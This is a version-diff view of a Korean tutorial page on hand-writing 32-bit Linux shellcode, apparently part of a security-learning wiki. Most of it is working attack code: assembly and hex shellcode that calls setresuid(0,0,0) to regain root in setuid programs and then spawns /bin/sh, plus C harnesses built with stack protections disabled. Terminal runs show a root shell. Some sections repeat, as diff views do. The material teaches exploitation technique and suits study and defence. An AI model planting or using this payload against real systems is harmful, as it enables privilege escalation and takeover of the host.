Versions Compared

Old Version 4

changes.mady.by.user Lazenca.0x0

Saved on

compared with

New Version Current

changes.mady.by.user Lazenca.0x0

Saved on

Key

  • This line was added.
  • This line was removed.
  • Formatting was changed.

...

  • 일부 Setuid가 설정된 프로그램에서 root 권한으로 초기 설정 후 seteuid() 함수를 이용하여 일반 권한을 변경하는 경우가 있습니다.
    • 이러한 경우 Shellcode를 사용해 shell을 획득하더라도 seteuid() 함수에 설정된 권한으로 shell을 실행하게 됩니다.
  • 앞에서 설명한 내용을 아래 코드를 사용해 확인 할 수 있습니다.
    • shellcode를 실행하기 전에 'seteuid(1000)' 함수를 이용해 프로그램의 권한을 일반 권한으로 변경하였습니다.
Code Block
titletestshell3.c
#include<stdio.h>
#include<string.h>
#include <unistd.h>
unsigned char shellcode [] = "\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\x8d\x4b\x08\x8d\x53\x0c\xb0\x0b\xcd\x80\xe8\xe5\xff\xff\xff/bin/sh";
unsigned char code[] = "";

void main(){
	seteuid(1000);
    int len = strlen(shellcode);
    printf("Shellcode len : %d\n",len);
    strcpy(code,shellcode);
    void (*function)() = (void(*)())code;

    function();
}

...

Code Block
titleBuild & Run
lazenca0x0@ubuntu:~/Shell$ gcc -o testshell3 -z execstack -m32 testshell3.c
lazenca0x0@ubuntu:~/Shell$ sudo chown root:root ./testshell3
lazenca0x0@ubuntu:~/Shell$ sudo chmod 4755 ./testshell3
lazenca0x0@ubuntu:~/Shell$ ls -al
total 44
drwxrwxr-x  2 lazenca0x0 lazenca0x0 4096 Feb 21 00:44 .
drwxr-xr-x 24 lazenca0x0 lazenca0x0 4096 Feb 15 00:37 ..
-rwsr-xr-x  1 root       root       7568 Feb 21 00:44 testshell3
-rw-rw-r--  1 lazenca0x0 lazenca0x0  431 Feb 21 00:43 testshell3.c
lazenca0x0@ubuntu:~/Shell$ ./testshell3
Shellcode len : 36
$ id
uid=1000(lazenca0x0) gid=1000(lazenca0x0) groups=1000(lazenca0x0),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
$

...

Code Block
languagecpp
titleshellshell4.c
#include <unistd.h>

int main() {
		char *argv[2] = {"/bin/sh", NULL};
		setresuid(0, 0, 0);
        execve(argv[0], argv, NULL);
}

...

Code Block
languagecpp
titleshellcodeshellcode2.s
BITS 32

jmp short last		; shell함수를 호출하기 위해 "last:"로 이동합니다.

shell:
	; setresuid(uid_t ruid, uid_t euid, uid_t suid);
	xor eax, eax    ; EAX 레지스터의 값을 0으로 만듭니다.
	xor ebx, ebx    ; EBX 레지스터의 값을 0으로 만듭니다.
	xor ecx, ecx    ; ECX 레지스터의 값을 0으로 만듭니다.
	xor edx, edx    ; EDX 레지스터의 값을 0으로 만듭니다.
	mov al, 164    	; AL 레지스터에 setresuid() 시스템 함수의 콜 번호를 저장합니다.
	int 0x80        ; 함수 실행, root 권한으로 설정하기 위해 모든 인자 값을 '0'을 설정했습니다.
	; int execve(const char *filename, char *const argv [], char *const envp[])
	pop ebx				; EBX 레지스터에 문자열의 시작 주소를 저장합니다.
	xor eax, eax		; EAX 레지스터의 값을 0으로 만듭니다.
	mov [ebx+7],al		; 문자열 "/bin/sh"끝에 Null byte를 저장합니다.
	mov [ebx+8],ebx		; [ebx+8] 영역에 EBX 레지스터에 저장된 주소 값을 저장합니다.
	mov [ebx+12],eax	; [ebx+12] 영역에 EAX 레지스터에 저장된 32비트 Null byte를 저장합니다.
	lea ecx, [ebx+8]	; argv 포인터의 값으로 [ebx+8]의 주소를 ECX 레지스터에 저장 합니다.
	lea edx, [ebx+12]	; envp 포인터의 값으로 [ebx+12]의 주소를 EDX 레지스터에 저장 합니다.
	mov al, 11			; AL 레지스터에 execve() 시스템 함수의 콜 번호를 저장합니다.
	int 0x80			; 함수 실행

last:
	call shell			; 문자열 "/bin/sh" 주소를 Stack에 저장하기 위해 해당 형태를 사용합니다.
	db '/bin/sh'		; call 명령어은 해당 주소를 shell 함수 종료 후 돌아갈 주소로 Stack에 저장합니다.

...

Code Block
titleBuild & Disassemble
lazenca0x0@ubuntu:~/Shell$ nasm shellcodeshellcode2.s 
lazenca0x0@ubuntu:~/Shell$ ndisasm shellcodeshellcode2
00000000  EB22              jmp short 0x24
00000002  31C0              xor ax,ax
00000004  31DB              xor bx,bx
00000006  31C9              xor cx,cx
00000008  31D2              xor dx,dx
0000000A  B0A4              mov al,0xa4
0000000C  CD80              int 0x80
0000000E  5B                pop bx
0000000F  31C0              xor ax,ax
00000011  884307            mov [bp+di+0x7],al
00000014  895B08            mov [bp+di+0x8],bx
00000017  89430C            mov [bp+di+0xc],ax
0000001A  8D4B08            lea cx,[bp+di+0x8]
0000001D  8D530C            lea dx,[bp+di+0xc]
00000020  B00B              mov al,0xb
00000022  CD80              int 0x80
00000024  E8D9FF            call word 0x0
00000027  FF                db 0xff
00000028  FF2F              jmp word far [bx]
0000002A  62696E            bound bp,[bx+di+0x6e]
0000002D  2F                das
0000002E  7368              jnc 0x98
lazenca0x0@ubuntu:~/Shell$

...

Code Block
languagecpp
titletest_ seteuidshell4.c
#include<stdio.h>
#include<string.h>
#include <unistd.h>
unsigned char shellcode [] = "\xeb\x22\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\xa4\xcd\x80\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\x8d\x4b\x08\x8d\x53\x0c\xb0\x0b\xcd\x80\xe8\xd9\xff\xff\xff/bin/sh";
unsigned char code[] = "";

void main(){
    int len = strlen(shellcode);
    printf("Shellcode len : %d\n",len);
	seteuid(1000);
    strcpy(code,shellcode);
	(*(void(*)()) code)();
}

...

Code Block
titleBuild & run
lazenca0x0@ubuntu:~/Shell$ gcc -o test_seteuidshell4 -fno-stack-protector -z execstack --no-pie -m32 test_seteuidshell4.c

lazenca0x0@ubuntu:~/Shell$ sudo chown root:root ./test_seteuidshell4
lazenca0x0@ubuntu:~/Shell$ sudo chmod 4755 ./test_seteuidshell4
lazenca0x0@ubuntu:~/Shell$ ./test_seteuidshell4
Shellcode len : 48
# id
uid=0(root) gid=1000(lazenca0x0) groups=1000(lazenca0x0),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
#

...

  • ESP 레지스터는 스택의 최상단 주소 값을 저장하고 있는 스택 포인터 입니다.
    • PUSH 명령어가 실행되면 Stack에 피연산자 값을 저장하고, ESP 레지스터에 새로운 최상위로 주소 값이 저장됩니다.
      • "ESP 레지스터에 저장된 주소 값" - 4 = PUSH 명령어 실행 후 최상위 주소값
    • POP 명령어가 실행되면 피연산자에 ESP 레지스터에 저장된 주소 영역에 저장된 값을 저장하고, ESP 레지스터에 새로운 최상위로 주소 값이 저장됩니다.
      • "ESP 레지스터에 저장된 주소 값" + 4 = POP 명령어 실행 후 최상위 주소값
  • ESP 레지스터와 PUSH 명령어를 이용하여 "/bin/sh" 문자열을 저장하고, 주소 값을 추출할 수 있습니다.
    • PUSH 명령어를 이용해 "/bin//sh" 문자열을 Stack에 저장합니다.
      • Null byte를 제거하기 위해 "/sh" 문자 앞에 '/' 문자를 추가합니다.
      • PUSH 명령어에 의해 ESP 레지스터는 "/bin//sh" 문자열의 시작주소를 저장하고 있습니다.
    • 즉, ESP 레지스터를 이용해 Stack에 저장된 "/bin//sh" 문자열의 주소를 얻을 수 있습니다.
    • 이로 인해 "jmp short last" 명령어는 사용하지 않아도 됩니다.
  • 다음과 같이 Shellcode를 작성할 수 있습니다.
Code Block
titleshellcodeshellcode3.s
BITS 32
  
; setresuid(uid_t ruid, uid_t euid, uid_t suid);
xor eax, eax    ; EAX 레지스터의 값을 0으로 만듭니다.
xor ebx, ebx    ; EBX 레지스터의 값을 0으로 만듭니다.
xor ecx, ecx    ; ECX 레지스터의 값를 0으로 만듭니다.
xor edx, edx    ; EDX 레지스터의 값를 0으로 만듭니다.
mov al, 0xa4    ; setresuid() 시스템 함수의 콜 번호 164(0xa4)를 AL 레지스터에 저장합니다.
int 0x80        ; setresuid(0, 0, 0) 프로세스의 루트 권한 복구
  
; execve(const char *filename, char *const argv [], char *const envp[])
xor eax, eax    ; EAX 레지스터의 값을 다시 한번 0으로 만듭니다.
mov al, 11      ; execve() 시스템 함수의 콜 번호 11을 AL 레지스터에 저장합니다.
push ecx        ; 문자열의 끝을 알리기 위해 Null을 "//sh" 뒤에 저장합니다.
push 0x68732f2f ; 문자 "//sh"를 스택에 저장합니다.
push 0x6e69622f ; 문자 "/bin"를 스택에 저장합니다.
mov ebx, esp    ; ESP 레지스터에서 "/bin//sh"의 주소를 가져와 EBX 레지스터에 저장합니다.

; 2번째 인자를 위한 문자열 포인터 생성 및 3번째 인자 값 설정
push edx        ; Null을 스택에 저장합니다.
mov edx, esp    ; 3번째 인자에 Null이 저장된 주소 값을 저장합니다.
push ebx        ; Stack에 "/bin//sh" 문자열의 시작 주소를 저장합니다.
mov ecx, esp    ; 2번째 인자에 문자열 포인터가 있는 인자 배열
int 0x80        ; execve("/bin//sh",["/bin//sh",NULL],[NULL])

Test program

  • 아래 코드를 이용해 해당 Shellcode를 테스트 앞에 코드를 빌드하면 아래와 같이 Shellcode를 획득 할 수 있습니다.
cpp
Code Block
language
titletest_esp.c
#include<stdio.h>
#include<string.h>

unsigned char shellcode [] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\xa4\xcd\x80\x31\xc0\xb0\x0b\x51\x68//shh/bin\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80";
unsigned char code[] = "";

void main(){
    int len = strlen(shellcode);
    printf("Shellcode len : %d\n",len);
    strcpy(code,shellcode);
	(*(void(*)()) code)();
}
  • 앞에서 작성한 Shellcode 보다 11 byte가 줄어들었습니다.
Code Block
titleBuild & Run
lazenca0x0@ubuntu:~/Shell$ gcc -o test_esp -fno-stack-protector -z execstack --no-pie -m32 test_esp.c
lazenca0x0@ubuntu:~/Shell$ ./test_esp
Shellcode len : 37
$ id
uid=1000(lazenca0x0) gid=1000(lazenca0x0) groups=1000(lazenca0x0),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
$

CDQ(Convert Doubleword to Quadword) instruction

  • CDQ(Convert Doubleword to Quadword)라는 단일 바이트 x86명령이 있습니다.

    • CDQ 명령은 EAX 레지스터에 저장된 값의 부호 비트(Sign Flag)를 EDX 레지스터에 확장합니다. 

      • EAX에 저장된 값이 양수(SF = 0)인 경우 CDQ 명령어에 의해 EDX에 0x00000000이 저장됩니다.

      • EAX에 저장된 값이 음수(SF = 1)인 경우 CDQ 명령어에 의해 EDX에 0xFFFFFFFF이 저장됩니다.

Code Block
titlePositive number
mov   eax, 0x5   ; eax = 0x5, SF = 0
cdq              ; edx = 0x00000000
Code Block
titleNegative number
mov   eax, 0x5   ; eax = 0x5
neg   eax        ; eax = 0xFFFFFFFB, SF = 1
cdq              ; edx = 0xFFFFFFFF
  • XOR 명령어로 EDX의 값을 0으로 변경하는 대신에 CDQ 명령어를 이용할 수 있습니다.
    • XOR 명령어를 표현하기 위해 2 byte를 사용하지만, CDQ 명령어는 1 byte를 사용합니다.
    • 즉, CDQ 명령어를 이용해 Shellcode의 크기를 1 byte를 줄일 수 있습니다.
Code Block
titleCDQ instruction
xor edx,edx ; 	31 D2 
cdq			;	99
  • 다음과 같이 Shellcode를 작성할 수 있습니다.
Build & Disassemble
lazenca0x0@ubuntu:~/Shell$ nasm shellcode3.s 
lazenca0x0@ubuntu:~/Shell$ ndisasm shellcode3
00000000  31C0              xor ax,ax
00000002  31DB              xor bx,bx
00000004  31C9              xor cx,cx
00000006  31D2              xor dx,dx
00000008  B0A4              mov al,0xa4
0000000A  CD80              int 0x80
0000000C  31C0              xor ax,ax
0000000E  B00B              mov al,0xb
00000010  51                push cx
00000011  682F2F            push word 0x2f2f
00000014  7368              jnc 0x7e
00000016  682F62            push word 0x622f
00000019  696E89E352        imul bp,[bp-0x77],word 0x52e3
0000001E  89E2              mov dx,sp
00000020  53                push bx
00000021  89E1              mov cx,sp
00000023  CD80              int 0x80
lazenca0x0@ubuntu:~/Shell$

Test program

  • 아래 코드를 이용해 해당 Shellcode를 테스트 할 수 있습니다.
Code Block
languagecpp
titleshell5.c
#include<stdio.h>
#include<string.h>

unsigned char shellcode [] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\xa4\xcd\x80\x31\xc0\xb0\x0b\x51\x68//shh/bin\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80";
unsigned char code[] = "";

void main(){
    int len = strlen(shellcode);
    printf("Shellcode len : %d\n",len);
    strcpy(code,shellcode);
	(*(void(*)()) code)();
}
  • 앞에서 작성한 Shellcode 보다 11 byte가 줄어들었습니다.
Code Block
titleBuild & Run
lazenca0x0@ubuntu:~/Shell$ gcc -o shell5 -z execstack -m32 shell5.c
lazenca0x0@ubuntu:~/Shell$ ./shell5
Shellcode len : 37
$ id
uid=1000(lazenca0x0) gid=1000(lazenca0x0) groups=1000(lazenca0x0),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
$

CDQ(Convert Doubleword to Quadword) instruction

  • CDQ(Convert Doubleword to Quadword)라는 단일 바이트 x86명령이 있습니다.

    • CDQ 명령은 EAX 레지스터에 저장된 값의 부호 비트(Sign Flag)를 EDX 레지스터에 확장합니다. 

      • EAX에 저장된 값이 양수(SF = 0)인 경우 CDQ 명령어에 의해 EDX에 0x00000000이 저장됩니다.

      • EAX에 저장된 값이 음수(SF = 1)인 경우 CDQ 명령어에 의해 EDX에 0xFFFFFFFF이 저장됩니다.

Code Block
titlePositive number
mov   eax, 0x5   ; eax = 0x5, SF = 0
cdq              ; edx = 0x00000000
Code Block
titleNegative number
mov   eax, 0x5   ; eax = 0x5
neg   eax        ; eax = 0xFFFFFFFB, SF = 1
cdq              ; edx = 0xFFFFFFFF
  • XOR 명령어로 EDX의 값을 0으로 변경하는 대신에 CDQ 명령어를 이용할 수 있습니다.
    • XOR 명령어를 표현하기 위해 2 byte를 사용하지만, CDQ 명령어는 1 byte를 사용합니다.
    • 즉, CDQ 명령어를 이용해 Shellcode의 크기를 1 byte를 줄일 수 있습니다.
Code Block
titleCDQ instruction
xor edx,edx ; 	31 D2 
cdq			;	99
  • 다음과 같이 Shellcode를 작성할 수 있습니다.
Code Block
languagecpp
titleshellcode4.s
BITS 32
  
; setresuid(uid_t ruid, uid_t euid, uid_t suid);
xor eax, eax    ; EAX레지스터의 값을 0으로 만듭니다.
xor ebx, ebx    ; EBX레지스터의 값을 0으로 만듭니다.
xor ecx, ecx    ; ECX레지스터의 값를 0으로 만듭니다.
cdq             ; EAX 레지스터에 저장된 값의 부호 비트(Sign Flag)를 가져와 EDX 레지스터의 값을 0으로 만듭니다.
mov al, 0xa4    ; setresuid() 시스템 함수의 콜 번호 164(0xa4)를 AL 레지스터에 저장합니다.
int 0x80        ; setresuid(0, 0, 0) 프로세스의 루트 권한 복구
  
; execve(const char *filename, char *const argv [], char *const envp[])
xor eax, eax    ; EAX레지스터의 값을 다시 한번 0으로 만듭니다.
mov al, 11      ; execve() 시스템 함수의 콜 번호 11을 AL 레지스터에 저장합니다.
push ecx        ; 문자열의 끝을 알리기 위해 Null을 "//sh" 뒤에 저장합니다.
push 0x68732f2f ; 문자 "//sh"를 스택에 저장합니다.
push 0x6e69622f ; 문자 "/bin"를 스택에 저장합니다.
mov ebx, esp    ; ESP 레지스터에서 "/bin//sh"의 주소를 가져와 EBX 레지스터에 저장합니다.

; 2번째 인자를 위한 문자열 포인터 생성 및 3번째 인자 값 설정
push edx        ; Null을 스택에 저장합니다.
mov edx, esp    ; 3번째 인자에 Null이 저장된 주소 값을 저장합니다.
push ebx        ; Stack에 "/bin//sh" 문자열의 시작 주소를 저장합니다.
mov ecx, esp    ; 2번째 인자에 문자열 포인터가 있는 인자 배열
int 0x80        ; execve("/bin//sh",["/bin//sh",NULL],[NULL])
  • 앞에 코드를 빌드하면 아래와 같이 Shellcode를 획득 할 수 있습니다.
Code Block
titleBuild & Disassemble
lazenca0x0@ubuntu:~/Shell$ nasm shellcode4.s 
lazenca0x0@ubuntu:~/Shell$ ndisasm shellcode4
00000000  31C0              xor ax,ax
00000002  31DB              xor bx,bx
00000004  31C9              xor cx,cx
00000006  99                cwd
00000007  B0A4              mov al,0xa4
00000009  CD80              int 0x80
0000000B  31C0              xor ax,ax
0000000D  B00B              mov al,0xb
0000000F  51                push cx
00000010  682F2F            push word 0x2f2f
00000013  7368              jnc 0x7d
00000015  682F62            push word 0x622f
00000018  696E89E352        imul bp,[bp-0x77],word 0x52e3
0000001D  89E2              mov dx,sp
0000001F  53                push bx
00000020  89E1              mov cx,sp
00000022  CD80              int 0x80
lazenca0x0@ubuntu:~/Shell$
Code Block
languagecpp
titleshellcode.s
BITS 32
  
; setresuid(uid_t ruid, uid_t euid, uid_t suid);
xor eax, eax    ; EAX레지스터의 값을 0으로 만듭니다.
xor ebx, ebx    ; EBX레지스터의 값을 0으로 만듭니다.
xor ecx, ecx    ; ECX레지스터의 값를 0으로 만듭니다.
cdq             ; EAX 레지스터에 저장된 값의 부호 비트(Sign Flag)를 가져와 EDX 레지스터의 값을 0으로 만듭니다.
mov al, 0xa4    ; setresuid() 시스템 함수의 콜 번호 164(0xa4)를 AL 레지스터에 저장합니다.
int 0x80        ; setresuid(0, 0, 0) 프로세스의 루트 권한 복구
  
; execve(const char *filename, char *const argv [], char *const envp[])
xor eax, eax    ; EAX레지스터의 값을 다시 한번 0으로 만듭니다.
mov al, 11      ; execve() 시스템 함수의 콜 번호 11을 AL 레지스터에 저장합니다.
push ecx        ; 문자열의 끝을 알리기 위해 Null을 "//sh" 뒤에 저장합니다.
push 0x68732f2f ; 문자 "//sh"를 스택에 저장합니다.
push 0x6e69622f ; 문자 "/bin"를 스택에 저장합니다.
mov ebx, esp    ; ESP 레지스터에서 "/bin//sh"의 주소를 가져와 EBX 레지스터에 저장합니다.

; 2번째 인자를 위한 문자열 포인터 생성 및 3번째 인자 값 설정
push edx        ; Null을 스택에 저장합니다.
mov edx, esp    ; 3번째 인자에 Null이 저장된 주소 값을 저장합니다.
push ebx        ; Stack에 "/bin//sh" 문자열의 시작 주소를 저장합니다.
mov ecx, esp    ; 2번째 인자에 문자열 포인터가 있는 인자 배열
int 0x80        ; execve("/bin//sh",["/bin//sh",NULL],[NULL])

Test program

  • 아래 코드를 이용해 해당 Shellcode를 테스트 할 수 있습니다.
Code Block
languagecpp
titletest_cdqshell6.c
#include<stdio.h>
#include<string.h>

unsigned char shellcode [] = "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x31\xc0\xb0\x0b\x51\x68//sh\x68/bin\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80";
unsigned char code[] = "";

void main(){
    int len = strlen(shellcode);
    printf("Shellcode len : %d\n",len);
    strcpy(code,shellcode);
	(*(void(*)()) code)();
}

...

Code Block
titleBuild & Run
lazenca0x0@ubuntu:~/Shell$ gcc -o test_cdqshell6 -fno-stack-protector -z execstack --no-pie -m32 test_cdqshell6.c
lazenca0x0@ubuntu:~/Shell$ ./test_cdqshell6
Shellcode len : 36
$ id
uid=1000(lazenca0x0) gid=1000(lazenca0x0) groups=1000(lazenca0x0),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
$

...

Code Block
languagecpp
titleshellcodeshellcode5.s
BITS 32
  
; setresuid(uid_t ruid, uid_t euid, uid_t suid);
xor eax, eax    ; EAX 레지스터의 값을 0으로 만듭니다.
xor ebx, ebx    ; EBX 레지스터의 값을 0으로 만듭니다.
xor ecx, ecx    ; ECX 레지스터의 값를 0으로 만듭니다.
cdq             ; EAX 레지스터에 저장된 값의 부호 비트(Sign Flag)를 가져와 EDX 레지스터의 값을 0으로 만듭니다.
mov al, 0xa4    ; setresuid() 시스템 함수의 콜 번호 164(0xa4)를 AL 레지스터에 저장합니다.
int 0x80        ; setresuid(0, 0, 0) 프로세스의 루트 권한 복구

; execve(const char *filename, char *const argv [], char *const envp[])
push BYTE 11    ; execve() 시스템 함수의 콜 번호 11을 Stack에 저장합니다.
pop eax         ; Stack에 저장된 11(더블워드)를 EAX 레지스터에 저장합니다.
push ecx        ; 문자열의 끝을 알리기 위해 Null을 먼저 Stack에 저장합니다.
push 0x68732f2f ; 문자 "//sh"를 스택에 저장합니다.
push 0x6e69622f ; 문자 "/bin"를 스택에 저장합니다.
mov ebx, esp    ; execve() 함수의 1번째 인자(EBX)로 "/bin//sh"의 주소(ESP)를 저장합니다.

; 2번째 인자를 위한 문자열 포인터 생성 및 3번째 인자 값 설정
push edx        ; Null을 스택에 저장합니다.
mov edx, esp    ; execve() 함수의 3번째 인자(EDX)로 Null이 저장된 주소 값을 저장합니다.
push ebx        ; Stack에 "/bin//sh" 문자열의 시작 주소를 저장합니다.
mov ecx, esp    ; execve() 함수의 2번째 인자(ECX)로 문자열 포인터가 저장된 배열의 주소 값을 저장합니다.
int 0x80        ; execve("/bin//sh",["/bin//sh",NULL],[NULL])

...

  • 아래 코드를 이용해 해당 Shellcode를 테스트 할 수 있습니다.
Code Block
languagecpp
titletest_popshell7.c
#include<stdio.h>
#include<string.h>

unsigned char shellcode [] = "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68//sh\x68/bin\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80";
unsigned char code[] = "";

void main(){
    int len = strlen(shellcode);
    printf("Shellcode len : %d\n",len);
    strcpy(code,shellcode);
	(*(void(*)()) code)();
}

...

Code Block
titleBuild & Run
lazenca0x0@ubuntu:~/Shell$ gcc -o test_popshell7 -fno-stack-protector -z execstack --no-pie -m32 test_popshell7.c
lazenca0x0@ubuntu:~/Shell$ ./test_popshell7
Shellcode len : 35
$ id
uid=1000(lazenca0x0) gid=1000(lazenca0x0) groups=1000(lazenca0x0),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
$

...

  • 앞에서 execve() 함수를 이용하여 "/bin/sh" 프로그램을 호출할 때 2번째 인자 값을 전달하였습니다.
  • 하지만 2번째 인자 값을 Null로 전달해도 프로그램을 실행 할 수 있습니다.


Code Block
languagecpp
titleexecveNull.c
#include <unistd.h>

int main() {
        execve("/bin/sh", NULL, NULL);
}
Code Block
titleBuild & Run
lazenca0x0@ubuntu:~$ gcc -o null execveNull.c 
execveNull.c: In function 'main':
execveNull.c:4:9: warning: null argument where non-null required (argument 2) [-Wnonnull]
         execve("/bin/sh", NULL, NULL);
         ^
lazenca0x0@ubuntu:~$ ./null
$ id
uid=1000(lazenca0x0) gid=1000(lazenca0x0) groups=1000(lazenca0x0),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
$ exit
lazenca0x0@ubuntu:~$
Info
titleexecve(2) - Linux manual page - man7.org
  • 다음과 같이 Shellcode를 작성할 수 있습니다.
Code Block
languagecpp
titlenullshellcode6.s
BITS 32
  
; setresuid(uid_t ruid, uid_t euid, uid_t suid);
xor eax, eax    ; EAX 레지스터의 값을 0으로 만듭니다.
xor ebx, ebx    ; EBX 레지스터의 값을 0으로 만듭니다.
xor ecx, ecx    ; ECX 레지스터의 값를 0으로 만듭니다.
cdq             ; EAX 레지스터에 저장된 값의 부호 비트(Sign Flag)를 가져와 EDX 레지스터의 값을 0으로 만듭니다.
				; execve() 함수의 3번째 인자(EDX)로 Null을 저장합니다.
mov al, 0xa4    ; setresuid() 시스템 함수의 콜 번호 164(0xa4)를 AL 레지스터에 저장합니다.
int 0x80        ; setresuid(0, 0, 0) 프로세스의 루트 권한 복구

; execve(const char *filename, char *const argv [], char *const envp[])
push BYTE 11    ; execve() 시스템 함수의 콜 번호 11을 Stack에 저장합니다.
pop eax         ; Stack에 저장된 11(더블워드)를 EAX 레지스터에 저장합니다.
push ecx        ; 문자열의 끝을 알리기 위해 Null을 먼저 Stack에 저장합니다.
push 0x68732f2f ; 문자 "//sh"를 스택에 저장합니다.
push 0x6e69622f ; 문자 "/bin"를 스택에 저장합니다.
mov ebx, esp    ; execve() 함수의 1번째 인자(EBX)로 "/bin//sh"의 주소(ESP)를 저장합니다.

; 2번째 인자를 위한 문자열 포인터 생성 및 3번째 인자 값 설정
mov ecx, edx    ; execve() 함수의 2번째 인자(ECX)로 Null을 저장합니다.
int 0x80        ; execve("/bin//sh",NULL,NULL)

...

  • 아래 코드를 이용해 해당 Shellcode를 테스트 할 수 있습니다.
Code Block
titlenullshell8.c
#include<stdio.h>
#include<string.h>

unsigned char shellcode [] = "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\xb\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xd1\xcd\x80";
unsigned char code[] = "";

void main(){
    int len = strlen(shellcode);
    printf("Shellcode len : %d\n",len);
    strcpy(code,shellcode);
	(*(void(*)()) code)();
}

...

Code Block
titleBuild & Run
lazenca0x0@ubuntu:~$ gcc -o nullshell8 -fno-stack-protector -z execstack --no-pie -m32 nullshell8.c
lazenca0x0@ubuntu:~$ ./nullshell8
Shellcode len : 31
$ id
uid=1000(lazenca0x0) gid=1000(lazenca0x0) groups=1000(lazenca0x0),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
$ exit
lazenca0x0@ubuntu:~$

...